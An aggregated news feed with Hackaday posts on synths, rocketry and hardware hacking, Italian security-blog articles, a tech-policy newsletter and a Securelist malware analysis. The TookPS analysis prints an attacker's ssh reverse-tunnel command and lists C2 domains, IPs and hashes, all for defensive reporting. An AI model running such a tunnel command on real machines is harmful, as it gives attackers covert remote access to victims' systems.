If you want to dip your toes into the deep, deep water of synth DIY but don’t know where to start, [Atarity] has just the resource for you. He’s compiled a list of 70 wonderful DIY synth and noise-making projects and put them all in one place. And as connoisseurs of the bleepy-bloopy ourselves, we can vouch for his choices here.

The collection runs that gamut from [Ray Wilson]’s “Music From Outer Space” analog oddities, through faithful recreations like Adafruit’s XOXBOX, and on to more modern synths powered by simple microcontrollers or even entire embedded Linux devices. Alongside the links to the original projects, there is also an estimate of the difficulty level, and a handy demo video for every example we tried out.

Our only self-serving complaint is that it’s a little bit light on the Logic Noise / CMOS-abuse side of synth hacking, but there are tons of other non-traditional noisemakers, sound manglers, and a good dose of musically useful devices here. Pick one, and get to work!

hackaday.com/2025/04/02/70-diy…

The list of countries to achieve their own successful orbital space launch is a short one, almost as small as the exclusive club of states that possess nuclear weapons. The Soviet Union was first off the rank in 1957, with the United States close behind in 1958, and a gaggle of other aerospace-adept states followed in the 1960s, 1970s, and 1980s. Italy, Iran, North Korea and South Korea have all joined the list since the dawn of the new millennium.

Absent from the list stands Australia. The proud island nation has never stood out as a player in the field of space exploration, despite offering ground station assistance to many missions from other nations over the years. However, the country has continued to inch its way to the top of the atmosphere, establishing its own space agency in 2018. Since then, development has continued apace, and the country’s first orbital launch appears to be just around the corner.

Space, Down Under

The Australian Space Agency has played an important role in supporting domestic space projects, like the ELO2 lunar rover (also known as “Roo-ver”). Credit: ASA
The establishment of the Australian Space Agency (ASA) took place relatively recently. The matter was seen to be long overdue from an OECD member country; by 2008, Australia was the only one left without a national space agency since previous state authorities had been disbanded in 1996. This was despite many facilities across the country contributing to international missions, providing critical radio downlink services and even welcoming JAXA’s Hayabusa2 spacecraft back to Earth.

Eventually, a groundswell grew, pressuring the government to put Australia on the right footing to seize growing opportunities in the space arena. Things came to a head in 2018, when the government established ASA to “support the growth and transformation of Australia’s space industry.”

ASA would serve a somewhat different role compared to organizations like NASA (USA) and ESA (EU). Many space agencies in other nations focus on developing launch vehicles and missions in-house, collaborating with international partners and aerospace companies in turn to do so. However, for ASA, the agency is more focused on supporting and developing the local space industry rather than doing the engineering work of getting to space itself.

Orbital Upstarts

Just because the government isn’t building its own rockets, doesn’t mean that Australia isn’t trying to get to orbit. That goal is the diehard mission of Gilmour Space Technologies. The space startup was founded in 2013, and established its rocketry program in 2015, and has been marching towards orbit ever since. As is often the way, the journey has been challenging, but the payoff of genuine space flight is growing ever closer.

Gilmour Space moved fast, launching its first hybrid rocket back in 2016. The successful suborbital launch proved to be a useful demonstration of the company’s efforts to produce a rocket that used 3D-printed fuel. This early milestone aided the company to secure investment that would support its push to grander launches at greater scale. The company’s next major launch was planned for 2019, but frustration struck—when the larger One Vision rocket suffered a failure just 7 seconds prior to liftoff. Undeterred, the company continued development of a larger rocket, taking on further investment and signing contracts to launch payloads to orbit in the ensuing years.

youtube.com/embed/5vyhef00ebY?…

Gilmour Space has worked hard to develop its hybrid rocket engines in-house.

With orbital launches and commercial payload deliveries the ultimate goal, it wasn’t enough to just develop a rocket. Working with the Australian government, Gilmour Space established the Bowen Orbital Spaceport in early 2024—a launchpad suitable for the scale of its intended space missions. Located on Queensland’s Gold Coast, it’s just 20 degrees south of the equator—closer than Cape Canaveral, and useful for accessing low- to mid-inclination equatorial orbits. The hope was to gain approval to launch later that year, but thus far, no test flights have taken place. Licensing issues around the launch have meant the company has had to hold back on shooting for orbit.

The rocket with which Gilmour Space intends to get there is called Eris. In Block 1 configuration, it stands 25 meters tall, and is intended to launch payloads up to 300 kg into low-Earth orbits. It’s a three-stage design. It uses four of Gilmour’s Sirius hybrid rocket motors in the first stage, and just one in the second stage. The third stage has a smaller liquid rocket engine of Gilmour’s design, named Phoenix. The rocket was first staged vertically on the launch pad in early 2024, and a later “dress rehearsal” for launch was performed in September, with the rocket fully fueled. However, flight did not take place, as launch permits were still pending from Australia’s Civil Aviation Safety Authority (CASA).

youtube.com/embed/-h8g1CfXopo?…

The Eris rocket was first vertically erected on the launchpad in 2024, but progress towards launch has been slow since then.

After a number of regulatory issues, the company’s first launch of Eris was slated for March 15, 2025. However, that day came and passed, even with CASA approval, as the required approvals were still not available from the Australian Space Agency. Delays have hurt the company’s finances, hampering its ability to raise further funds. As for the rocket itself, hopes for Eris’s performance at this stage remain limited, even if you ask those at Gilmour Space. Earlier this month, founder Adam Gilmour spoke to the Sydney Morning Heraldon his expectations for the initial launch. Realistic about the proposition of hitting orbit on the company first attempt, he expects it to take several launches to achieve, with some teething problems to come. “It’s very hard to test an orbital rocket without just flying it,” he told the Herald. “We don’t have high expectations we’ll get to orbit… I’d personally be happy to get off the pad.”

Despite the trepidation, Eris stands as Australia’s closest shot at hitting the bigtime outside the atmosphere. Government approvals and technical hurdles will still need to be overcome, with the Australian Space Agency noting that the company still has licence conditions to meet before a full launch is approved. Still, before the year is out, Australia might join that vaunted list of nations that have leapt beyond the ground to circle the Earth from above. It will be a proud day when that comes to pass.

hackaday.com/2025/04/02/austra…

Gli analisti di Sucuri hanno scoperto che gli hacker utilizzano la directory MU-plugins (Must-Use Plugins) di WordPress per nascondere codice dannoso ed eseguirlo senza essere rilevati. La tecnica è stata individuata per la prima volta nel febbraio 2025, ma la sua adozione è in crescita: gli aggressori stanno attualmente sfruttando i plugin MU per lanciare tre diversi tipi di codice dannoso.

Questo genere di plugin sono un tipo speciale di plugin di WordPress che vengono eseguiti a ogni caricamento di pagina e non richiedono l’attivazione nel pannello di amministrazione. Si tratta di file PHP memorizzati nella directory wp-content/mu-plugins/ che vengono eseguiti automaticamente quando la pagina viene caricata e non vengono visualizzati nel pannello di amministrazione nella pagina Plugin, a meno che non venga selezionato il filtro Must-Use.

Tali plugin vengono utilizzati, ad esempio, per applicare regole di sicurezza personalizzate su scala dell’intero sito, migliorare le prestazioni, modificare dinamicamente le variabili e così via. Poiché i plugin MU vengono eseguiti a ogni caricamento di pagina e non compaiono nell’elenco dei plugin standard, possono essere utilizzati per eseguire segretamente un’ampia gamma di attività dannose, tra cui il furto di credenziali, l’iniezione di codice dannoso o la modifica dell’output HTML.

Gli specialisti di Sucuri hanno scoperto tre payload che gli aggressori inseriscono nella directory MU-plugins:

• redirect.php : reindirizza i visitatori (esclusi i bot e gli amministratori registrati) a un sito dannoso (updatesnow[.]net) che visualizza una falsa richiesta di aggiornamento del browser per indurre la vittima a scaricare malware;
• index.php : una web shell che funge da backdoor, recuperando ed eseguendo codice PHP da un repository GitHub;
• custom-js-loader.php : carica JavaScript che sostituisce tutte le immagini sul sito con contenuti espliciti e intercetta tutti i link esterni, aprendo invece pop-up fraudolenti.

I ricercatori ritengono che la web shell sia il più pericoloso tra questi esempi, poiché consente agli aggressori di eseguire comandi da remoto sul server, rubare dati e condurre successivi attacchi agli utenti e ai visitatori della risorsa.

Gli altri due tipi di malware hanno maggiori probabilità di danneggiare la reputazione e la SEO di un sito attraverso reindirizzamenti sospetti e tentativi di installare malware sui computer dei visitatori.

Finora i ricercatori di Sucuri non sono riusciti a determinare il metodo esatto con cui sono stati infettati i siti web interessati. Si ritiene che gli aggressori sfruttino vulnerabilità note nei plugin e nei temi di WordPress oppure credenziali di amministratore deboli.

L'articolo Attacco invisibile su WordPress: gli hacker stanno sfruttando i MU-Plugins per colpire i siti web proviene da il blog della sicurezza informatica.

Our colleague from the Pirate Party of Switzerland, Carlos Polo, attended the United Nations Economic Commission for Europe (UNECE) Resource Management Week 2025 in Geneva from March 24 to 28. The goal of the event was to discuss sustainable management of energy and mineral resources. ​Participants explored the adoption of the United Nations Framework Classification for Resources (UNFC) and the United Nations Resource Management System (UNRMS). Numerous experts spoke on ‘just energy transition’, whereby we are converting from fossil fuels to more environmentally friendly energy use. Our representatives very much appreciate going to the events, as well as the side events that can be less formal and provide more opportunities to interact. The main side event was the Geneva Dialogues on Mineral and Metal Resources and the FutuRaM project on forecasting raw material availability. Carlos has been representing us as a volunteer representative for many years in Geneva, and we greatly appreciate his attendance. If you would also like to join our team of UN volunteers, please let us know.

pp-international.net/2025/04/u…

SUPPORTED BY

HELO, GWLEIDYDDIAETH DDIGIDOL YW HYN. For those who don't speak Welsh (like me), that's 'Hello, this is Digital Politics." I'm Mark Scott, and this edition comes to you from an unseasonably warm (well, for the United Kingdom) Welsh coastal village. Normal transmission will resume next week.

— The digital world is increasingly divided between Great Powers. That has left a lot of room for so-called 'middle powers' to exert outsized influence.

— The world of trust and safety is wading through treacherous political waters that will leave many caught between rival national governments.

— Ahead of pending US tariffs to be announced on April 2, it's worth remembering global digital exports have doubled over the last 10 years.

Let's get started.

How to make your mark in digital policymaking

THE UNITED STATES. CHINA. THE EUROPEAN UNION. When it comes to digital, those three make up the trifecta of global powers — for different reasons. The US is home to the world's biggest and most vibrant tech sector — but with few checks for citizens. China's authoritarian control of the internet has fast-tracked new services (and repression) like no other. The EU's world-leading digital regulation offers a third way between outright capitalism and state rule — with a lack of homegrown tech.

Yet in the Digital Great Gate that has engulfed this year, let's take a minute to think about middle powers. Those are the countries like Japan, the UK and Brazil that have sizable domestic markets, exert regional clout due to their size/national expertise and often chart a different path on tech that may be more useful to others caught between the vying interests of China, the US and EU.

It's unrealistic that, say, a Philippines (despite its 100m+ population) is ever going to sit side-by-side next to China to export its own vision of digital across Asia. Ditto goes for Argentina in Latin America. Wouldn't it be better to learn lessons from such middle powers that have created their own way (often with mixed reasons) rather than falling into one of the camps led by the world's three largest digital powers?

If you want to know what that looks like, spend some time in Tokyo. Yes, the world's fourth-largest global economy isn't a slouch when it comes to economic prowess. But its aging population, limited linguistic prowess (sorry to all my Japanese-speaking readers!) and positioning close to China have forced Japan to take some bold swings on digital policymaking that are worth a second look.

**A message from Microsoft** Each day, millions of people use generative AI. Abusive AI-generated content, however, can present risks to vulnerable groups such as women, children, and older adults. In a new white paper, developed in consultation with civil society, we present actionable policy recommendations to promote a safer digital environment.**

The country's recently-announced AI proposals (overview here) are anything but a copy-paste of the EU's AI Act — unlike, ahem, what South Korea tabled. Some may not think Tokyo has gone far enough by only requiring AI companies to cooperate with government AI efforts. But the title of the legislation — "Bill on the Promotion of Research, Development and Utilization of Artificial Intelligence-Related Technologies" — makes clear the proposed rules are more about enabling the emerging technology within the economy, and not about curtailing its use due to concerns AI will undermine society.

The proposals also require Japan to align with "international standards." What those AI standards will be is currently unclear. But it's a hat tip to the wider global (read: Western) policymaking conversation around AI where Japan has continued to punch above its weight. That goes for everything from Tokyo's work around the so-called Hiroshima Process on generative AI to its closed-door leadership via the Organization for Economic Cooperation and Development on global data governance standards (crucial for the ongoing sharing of data internationally).

There are a couple of lessons from Japan's digital policymaking that apply to other countries seeking to make their mark.

First, don't try to do everything at once. Tokyo doesn't want to convince everyone to follow its lead. Instead, it often takes a pragmatic view on a small number of issues where it believes it can make a difference and that will benefit its local businesses/citizens.

Second, a willingness to play host to the bigger powers, which is what Japan did with the Hiroshima Process, can buy you international political capital, on both digital and non-digital issues, that you can tap into further down the line. Recognizing where a country can add value — as a convener, for instance — allows local officials to navigate the inherent difficulties when trying to balance the interests of the Great Digital Powers.

Thanks for reading the free monthly version of Digital Politics. Paid subscribers receive at least one newsletter a week. If that sounds like your jam, please sign up here.

Here's what paid subscribers read in March:
— Claims that online safety rules are censorship have gone global; Europe's digital rules are not seen to help its citizens; Global data flows are not slowing down. More here.
— A readout on Trump 2.0's approach to digital policy; Why Canada worries about US interference in its election; A debrief on the EU's AI 'gigafactories.' More here.
— Four ways that social media can be made more transparent and accountable via supporting how outsiders access platform data. More here.
— Why we need to come up with a better version of 'tech sovereignty;' Apple's antitrust loss in Brussels is good for (most) Big Tech; AI models' lack of regional diversity. More here.

That's where middle powers can truly come into their own. By outlining a nimble digital policy agenda that centers on a small number of targeted objectives — versus trying to boil the ocean with an overly-complex and broad agenda — countries beyond the EU, China and the US can find niche tech issues that benefit their local constituencies.

That's the positive view. Now for the negative: the UK.

I've already expressed my reservations for London's quixotic approach to digital policy. In short: the only thing that matters, really, is boosting foreign direct investment into the country's region-leading tech sector. And, to be clear, there's nothing wrong with that.

But that hasn't stopped British politicians and policymakers from trying to bite off more than they can chew on everything from online safety to artificial intelligence to digital competition. In recent years, the UK has swung for the fences on all three of those areas, promoting itself as a world-leading center of digital regulation and tech-related industry. You can have the Online Safety Act AND be home to scores of global platform workers. You can pass sophisticated digital antitrust rules AND support the acquisition of local startups by Big Tech giants.

Frankly, I just don't buy it. Unlike Japan, the UK tries to play in the same realm as the US, China and the EU, but doesn't have the economic firepower or the regulatory muscle to do that well. Instead, London finds itself in the worst of all worlds. A middle power (with a lot of strong attributes upon which to call) that is too small to play in the Big Leagues but is unable — or unwilling? — to relegate itself to the second tier where it could really make a difference.

That should be a warning to other countries seeking to find their own path on digital policymaking. Don't pretend you can go head-to-head with global powers when you'll only end up on the worse side of that encounter.

More importantly — and this is especially true for London and its longstanding desire to remain in lockstep with the US — don't change your own digital agenda to fit into the ever-changing policies of longstanding allies.

London's decision, at the last minute, not to sign the communiqué at the recent Paris AI Action Summit because the US had decided not to hurt that country's global reputation with not much upside gained with Washington. The UK's "will they, or won't they" approach to pulling back on exiting digital regulation equally has not positioned the Brits as a safe pair of hands in the ever complex world of global tech policy.

In short, when it comes to navigating a country's own path on digital policy, be more like Japan, and less like the UK.

Chart of the Week

DONALD TRUMP'S ADMINISTRATION WILL UNVEIL a cavalcade of global tariffs on April 2 which some in the White House are calling "Liberation Day."

Thankfully, much of the digital world has escaped these threats as negotiations via the World Trade Organization mostly exempted so-called "electronic transmissions" (read: online purchases) from such duties.

It's a good thing, too. At least for global trade. Over the last decade, trade via so-called "digitally-delivered services" has roughly doubled, based on global exports (see left chart) and imports (see right chart.)

Source: World Trade Organization

Geopolitics is coming for Trust & Safety Inc

LAST WEEK WAS THE SECOND INSTALLMENTof my (London-based) tech policy meet-up series known as "Marked as Urgent." I run it alongside Ben Whitelaw (and his Everything in Moderation newsletter) and Georgia Iacovou (and her Horrific/Terrific newsletter.) Photos here — and let me know if you're down for us bringing the roadshow to your city. We're game.

The topic of the night was: "What next for Trust & Safety?" Disclaimer: I can be a little like a one-trick pony. But I spoke about how the world of (international) politics is almost certainly going to hit the T&S industry like a ton of bricks in the coming months. I'm not sure many in the sector either know or are prepared for what is coming down the pike.

Let's walk through this.

First, there is a growing divide, in the democratic world, between the US and everyone else. No, I'm not talking about Washington's overall shift in policy. Instead, the likes of Australia, Canada and South Korea are quickly moving to impose rules on online platforms to moderate illegal speech — and force companies to explain exactly how they are doing that.

In the US, Trump's position on any form of content moderation — that it is a form of illegal censorship — is well known. It's now getting implemented via Congressional hearings, White House directives and efforts by US federal agencies. That comes despite a growing sophistication in the US-based trust and safety sector that remains arguably the largest, globally, despite the recent shift in political winds.

Second, this split between the US and everyone else on content moderation will force companies to pick sides. Some will do it happily (looking at you, Meta.) Others will shift gears out of either regulatory necessity or political calculation to keep them on the right side of specific world leaders. Yet there will be inherent conflicts when rank-and-file trust and safety experts continue the daily work of complying with national online safety rules, while companies' top executives make public statements about why they believe such work should be stopped.

**A message from Microsoft** New technologies like AI supercharge creativity, business, and more. At the same time, we must take steps to ensure AI is resistant to abuse. Our latest white paper, "Protecting the Public from Abusive AI-Generated Content across the EU," highlights the weaponization of women’s nonconsensual imagery, AI-powered scams and financial fraud targeting older adults, and the proliferation of synthetic child sexual abuse.

The paper outlines steps Microsoft is taking to combat these risks and provides recommendations as to how the EU's existing regulatory framework can be used to combat the abuse of AI-generated content by bad actors. We thank Women Political Leaders, the MenABLE project, the Internet Watch Foundation, the WeProtect Global Alliance, and the European Senior’s Union for their important work and support. Click here to read more.**

I don't envy those inside the platforms who will be stuck between those public statements and the day-to-day requirements of regulatory compliance.

Yet for those outside of the US, don't expect the political world to leave you alone, either.

Now that we are a couple of years into mandatory online safety regimes (well, almost a decade if you're in Australia), there are few lawmakers who are making the case, publicly, about why such rules are good for voters. Sure, national leaders make statements about online kids safety, digital terrorism or (Russian) foreign interference whenever a big news event happens. But there's no elected official really explaining to people why trust and safety is crucial to both creating a more inclusive online environment and (important for any politician) why it's in the country's national interest.

Sign up for Digital Politics

Thanks for getting this far. Enjoyed what you've read? Why not receive weekly updates on how the worlds of technology and politics are colliding like never before. The first two weeks of any paid subscription are free.

Subscribe
Email sent! Check your inbox to complete your signup.

No spam. Unsubscribe anytime.

That's a problem. It's a problem because, at some point, the White House is likely to impose retaliatory tariffs on a country that announces some form of fine and/or remedy on an American social media giant. The Trump 2.0 administration specifically called out the UK and EU online safety regimes for undermining freedom of speech. At this point, we should take Washington at its word about taking such future action.

If/when those tariffs start, which politician in those targeted countries is going to stand up for these regimes? Which leader will be willing to go to the mattresses to defend a national online safety regime so that it doesn't become a bargaining chip in wider trade negotiations with the US?

Currently, I don't see clear support from non-US politicians on those points. It should concern anyone working in the trust and safety industry that there is no mainstream politically buy-in for the work that they do. Especially, as stated above, when there's also growing internal apathy in many of these companies for that work, too.

In the coming months, I'm still unclear how this will play out. Both inside social media giants and within countries' political establishments. But what I do know is that all forms of platform governance will become increasingly intertwined with geopolitics in the months ahead.

Thanks for getting this far. If you're interested in sponsoring future editions of Digital Politics, please get in touch on digitalpolitics@protonmail.com

What I'm reading

— The European Commission announced $1.4 billion in financial support for artificial intelligence, cybersecurity and digital skills across the 27-country bloc. More here.

— The Carnegie Endowment for International Peace goes deep into how decentralized versions of social media platforms represent a new way to govern online spaces. More here.

— The US Office of the Director of National Intelligence published its annual threat assessment, including areas associated with tech. More here.

— Researchers from the University of Münster in Germany delved into how TikTok audio clips were used in disinformation campaigns related to the war in Ukraine. More here.

— British regulators explained why they believed the country's existing rules would foster the development of next-generation AI models. More here.

— The International Association of Privacy Professionals and Harvard's Berkman Klein Center for Internet & Society are organizing a two-day retreat for digital policy leaders in June. They've just opened up registrations here.

digitalpolitics.co/newsletter0…

Getting a look at the internals of a garden variety “wall wart” isn’t the sort of thing that’s likely to excite the average Hackaday reader. You’ve probably cracked one open yourself, and even if you haven’t, you’ve likely got a pretty good idea of what’s inside that sealed up brick of plastic. But sometimes a teardown can be just as much about the journey as it is the end result.

Truth be told, we’re not 100% sure if this teardown from [Brian Dipert] over at EDN was meant as an April Fool’s joke or not. Certainly it was posted on the right day, but the style is close enough to some of his previous work that it’s hard to say. In any event, he’s created a visual feast — never in history has an AC/DC adapter been photographed so completely and tastefully.
An Ode to the Diode
[Brian] even goes so far as to include images of the 2.5 lb sledgehammer and paint scraper that he uses to brutally break open the ultrasonic-welded enclosure. The dichotomy between the thoughtful imagery and the savage way [Brian] breaks the device open only adds to the surreal nature of the piece. Truly, the whole thing seems like it should be part of some avant garde installation in SoHo.

After he’s presented more than 20 images of the exterior of the broken wall wart, [Brian] finally gets to looking at the internals. There’s really not much to look at, there’s a few circuit diagrams and an explanation of the theory behind these unregulated power supplies, and then the write-up comes to a close as abruptly as it started.

So does it raise the simple teardown to an art form? We’re not sure, but we know that we’ll never look at a power adapter in quite the same way again.

hackaday.com/2025/04/02/the-lo…

In early March, we published a study detailing several malicious campaigns that exploited the popular DeepSeek LLM as a lure. Subsequent telemetry analysis indicated that the TookPS downloader, a malware strain detailed in the article, was not limited to mimicking neural networks. We identified fraudulent websites mimic official sources for remote desktop and 3D modeling software, alongside pages offering these applications as free downloads.

Malicious websites

UltraViewer, AutoCAD, and SketchUp are common business tools. Therefore, potential victims of this campaign include both individual users and organizations.

Our telemetry also detected file names such as “Ableton.exe” and “QuickenApp.exe”, alongside malicious websites. Ableton is music production software for composition, recording, mixing, and mastering, and Quicken is a personal finance app for tracking expenses, income, debts, and investments across various accounts.

TookPS

In our report on attacks exploiting DeepSeek as a lure, we outlined the infection chain initiated by Trojan-Downloader.Win32.TookPS. Let us delve into this. Upon infiltrating a victim’s device, the downloader reaches out to its C2 server, whose domain is embedded in its code, to retrieve a PowerShell script. Different malware samples communicate with different domains. For example, the file with the MD5 hash 2AEF18C97265D00358D6A778B9470960 reached out to bsrecov4[.]digital, which was inactive at the time of our research. It received the following base64-encoded command from that domain:

Original command

Decoding reveals the PowerShell command being executed:

The variable “$TookEnc” stores an additional base64-encoded data block, also executed in PowerShell. Decrypting this reveals the following command:

Decoded command from $TookEnc variable shown in the previous screenshot

Example of decrypting another command from $TookEnc variable

Although different samples contain different URLs, the command structure remains identical. These commands sequentially download and execute three PowerShell scripts from the specified URL. The first script downloads “sshd.exe”, its configuration file (“config”), and an RSA key file from the C2 server. The second script retrieves command-line parameters for “sshd” (remote server address, port, and username), and then runs “sshd”.

Example of a malicious PowerShell command generated by the PowerShell script:
ssh.exe -N -R 41431:localhost:109 Rc7DexAU73l@$ip_address -i "$user\.ssh\Rc7DexAU73l.41431" -f "$user\.ssh\config"
This command starts an SSH server, thereby establishing a tunnel between the infected device and the remote server. For authentication, it uses the RSA key downloaded earlier, and the server configuration is sourced from the “config” file. Through this tunnel, the attacker gains full system access, allowing for arbitrary command execution.

The third script attempts to download a modified version of the Backdoor.Win32.TeviRat malware onto the victim’s machine, which is a well-known backdoor. The sample we obtained uses DLL sideloading to modify and deploy the TeamViewer remote access software onto infected devices. In simple terms, the attackers place a malicious library in the same folder as TeamViewer, which alters the software’s default behavior and settings, hiding it from the user and providing the attackers with covert remote access. This campaign used the domain invoicingtools[.]com as the C2.

Part of the script that downloads Backdoor.Win32.TeviRat

Additionally, Backdoor.Win32.Lapmon.* is downloaded onto the compromised device. Unfortunately, we were not able to establish the exact delivery method. This backdoor uses the domain twomg[.]xyz as its C2.

In this manner, the attackers gain complete access to the victim’s computer in variety of ways.

Infrastructure

The malicious scripts and programs in this attack primarily used domains registered in early 2024, hosted at two IP addresses:

C2 domains and corresponding IPs

We found no legitimate user-facing resources at these IP addresses. Alongside the campaign-related domains, we also found other domains long blocked by our security solutions. This strongly suggests these attackers had used other tools prior to TookPS, Lapmon, and TeviRat.

Takeaways

The DeepSeek lure attacks were merely a glimpse into a large-scale campaign targeting both home users and organizations. The malware distributed by the attackers was disguised as popular software, including business-critical applications. They attempted to gain covert access to the victim’s device through a variety of methods after the initial infection.

To protect against these attacks, users are advised to remain vigilant and avoid downloading pirated software, which may represent a serious threat.

Organizations should establish robust security policies prohibiting software downloads from dubious sources like pirated websites and torrents. Additionally, regular security awareness training is essential for ensuring a proper level of employee vigilance.

IOCs

MD5
46A5BB3AA97EA93622026D479C2116DE
2DB229A19FF35F646DC6F099E6BEC51F
EB6B3BCB6DF432D39B5162F3310283FB
08E82A51E70CA67BB23CF08CB83D5788
8D1E20B5F2D89F62B4FB7F90BC8E29F6
D26C026FBF428152D5280ED07330A41C
8FFB2A7EFFD764B1D4016C1DF92FC5F5
A3DF564352171C207CA0B2D97CE5BB1A
2AEF18C97265D00358D6A778B9470960
8D0E1307084B4354E86F5F837D55DB87
7CB0CA44516968735E40F4FAC8C615CE
62CCA72B0BAE094E1ACC7464E58339C0
D1D785750E46A40DEF569664186B8B40
EE76D132E179623AD154CD5FB7810B3E
31566F18710E18F72D020DCC2FCCF2BA
F1D068C56F6023FB25A4F4F0CC02E9A1
960DFF82FFB90A00321512CDB962AA5B
9B724BF1014707966949208C4CE067EE

URLs
Nicecolns[.]com
sketchup-i3dmodels-download[.]top
polysoft[.]org
autocad-cracked[.]com
ultraviewer[.]icu
ultraview-ramotepc[.]top
bsrecov4[.]digital
downloader[.]monster
download[.]monster
pstuk[.]xyz
tukeps2ld[.]online
twomg[.]xyz
tuntun2[.]digital
invoicingtools[.]com
tu02n[.]website
inreport2[.]xyz
inrep[.]xyz

IPs
88[.]119.175.187
88[.]119.175.184
88[.]119.175.190

securelist.com/tookps/116019/

A tutto il Fediverso, ripeto, a tutto il Fediverso.

Allarme, ripeto allarme.

May Day, May Day!

Da notti sento qualcosa che si sta sgranocchiando l'armadio nella mia camera da letto, temo siano tarli.

Devo fare un trattamento antitarlo ma non l'ho mai fatto, e in più sono un uomo moderno, di quelli che non sanno fare niente (al contrario degli uomini di una volta, che sapevano fare tutto).

Qualcuno di voi ha esperienza di trattamenti del genere?

Non datemi link a pagine che ne parlano, quelli li trovo da me, cerco gente che l'ha fatto per davvero.

Basta Trump, basta Vance, basta Musk, da oggi vi voglio tutti concentrati sul mio armadio.

Passo.

Con l’uso crescente di strumenti di collaborazione come Microsoft Teams, le aziende devono essere consapevoli dei rischi legati a possibili attacchi informatici. Implementare misure di sicurezza avanzate e formare adeguatamente gli utenti diventa essenziale per contrastare le minacce. In risposta a questo problema, Microsoft ha annunciato l’introduzione di notifiche di sicurezza in Quick Assist, progettate per avvisare gli utenti di possibili tentativi di truffa legati al supporto tecnico. Inoltre, si consiglia alle organizzazioni di limitare o disattivare l’uso di Quick Assist e altri strumenti di accesso remoto, qualora non siano strettamente necessari, per ridurre il rischio di compromissione.

Un attacco sofisticato con vishing e strumenti legittimi

Un recente rapporto del Cyber Defence Centre di Ontinue ha documentato un attacco in cui gli hacker hanno utilizzato una combinazione di ingegneria sociale, vishing (phishing vocale) e software di accesso remoto per infiltrarsi nei sistemi aziendali.

La tecnica di attacco prevedeva l’invio di un messaggio su Microsoft Teams contenente un comando PowerShell dannoso. Approfittando della fiducia degli utenti nelle comunicazioni interne, il cybercriminale si spacciava per un tecnico IT per convincere la vittima ad eseguire il comando e a concedere accesso remoto attraverso Quick Assist. Questa tattica è coerente con le tecniche adottate dal gruppo Storm-1811, noto per utilizzare vishing e strumenti di supporto remoto per ottenere il controllo dei dispositivi bersaglio.

Il payload e l’installazione della backdoor

Dopo aver ottenuto l’accesso iniziale, gli attaccanti hanno sfruttato il sideloading DLL per eseguire codice malevolo attraverso un file binario firmato e legittimo di TeamViewer.exe, che ha caricato un modulo dannoso TV.dll.

Questo approccio consente di eludere i sistemi di sicurezza, poiché l’eseguibile sembra autentico. La seconda fase dell’attacco ha comportato l’esecuzione di una backdoor basata su JavaScript tramite Node.js (hcmd.exe), la quale ha stabilito una connessione persistente ai server di comando e controllo degli aggressori.

Grazie alle funzionalità socket, gli hacker potevano eseguire comandi da remoto senza essere rilevati facilmente.

Strategie di rilevamento e prevenzione

La catena di attacco osservata rientra in diverse categorie del framework MITRE ATT&CK, tra cui:

• T1105 – Trasferimento di strumenti malevoli
• T1656 – Impersonificazione
• T1219 – Utilizzo di software di accesso remoto
• T1218 – Esecuzione tramite binari firmati
• T1197 – Abuso dei lavori BITS

Per mitigare il rischio di simili attacchi, gli esperti di sicurezza consigliano alle aziende di limitare l’uso di strumenti di accesso remoto non indispensabili e di disabilitare le connessioni esterne a Teams. Inoltre, la formazione dei dipendenti su tecniche di ingegneria sociale e phishing vocale è fondamentale per ridurre la probabilità di cadere vittima di queste sofisticate campagne malevole.

L'articolo Attacco informatico via Teams: un semplice messaggio può compromettere la tua azienda! proviene da il blog della sicurezza informatica.

It’s official, we’re living in the future. Certainly that’s the only explanation for how [wrongbaud] was able to write a three-part series of posts on hacking a cheap electric toothbrush off of AliExpress.

As you might have guessed, this isn’t exactly a hack out of necessity. With a flair for explaining hardware hacking, [wrongbaud] has put this together as a practical “brush-up” (get it?) on the tools and concepts involved in reverse engineering. In this case, the Raspberry Pi is used as a sort of hardware hacking multi-tool, which should make it relatively easy to follow along.
Modified image data on the SPI flash chip.
The first post in the series goes over getting the Pi up and running, which includes setting up OpenOCD. From there, [wrongbaud] actually cracks the toothbrush open and starts identifying interesting components, which pretty quickly leads to the discovery of a debug serial port. The next step is harassing the SPI flash chip on the board to extract its contents. As the toothbrush has a high-res color display (of course it does), it turns out this chip holds the images which indicate the various modes of operation. He’s eventually able to determine how the images are stored, inject new graphics data, and write it back to the chip.

Being able to display the Wrencher logo on our toothbrush would already be a win in our book, but [wrongbaud] isn’t done yet. For the last series in the post, he shows how to extract the actual firmware from the microcontroller using OpenOCD. This includes how to analyze the image, modify it, and eventually flash the new version back to the hardware — using that debug port discovered earlier to confirm the patched code is running as expected.

If you like his work with a toothbrush, you’ll love seeing what [wrongbaud] can do with an SSD or even an Xbox controller.

hackaday.com/2025/04/02/a-toot…